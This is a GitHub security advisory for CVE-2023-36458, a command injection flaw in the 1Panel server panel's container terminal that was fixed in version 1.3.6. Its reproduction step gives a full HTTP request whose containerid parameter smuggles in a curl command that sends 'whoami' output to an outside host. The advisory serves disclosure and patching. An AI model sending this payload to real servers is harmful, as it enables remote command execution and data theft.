GitHub Advisoryadvisory · Go
GHSA-7x2c-fgx6-xf9h 1Panel vulnerable to command injection when entering the container terminal
MEDIUM
Official page ↗
- Aliases
- CVE-2023-36458
- Ecosystem
- Go
- Packages
- github.com/1Panel-dev/1Panel
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
- Weaknesses
- CWE-77
- Reviewed
- 2023-07-05
Affected packages
• Go github.com/1Panel-dev/1Panel: < 1.3.6 → fixed in 1.3.6
Description
Impact
The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.
1. Vulnerability analysis.
```
backend\app\api\v1\terminal.go#ContainerWsSsh
```
2. vulnerability reproduction.
```
GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: http://192.168.109.152:40982
Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
Connection: keep-alive, Upgrade
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
```
3. The successful execution of system commands.
Affected versions: <= 1.3.5
Patches
The vulnerability has been fixed in v1.3.6.
Workarounds
It is recommended to upgrade the version to v1.3.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel
Email us at [email protected]
Related
Alias · CVE (1)
- CVE-2023-36458 1Panel is an open source Linux server operation and maintenance management panel. vulnerability
Weakness · CWE (1)
- CWE-77 Improper Neutralization of Special Elements used in a Command weakness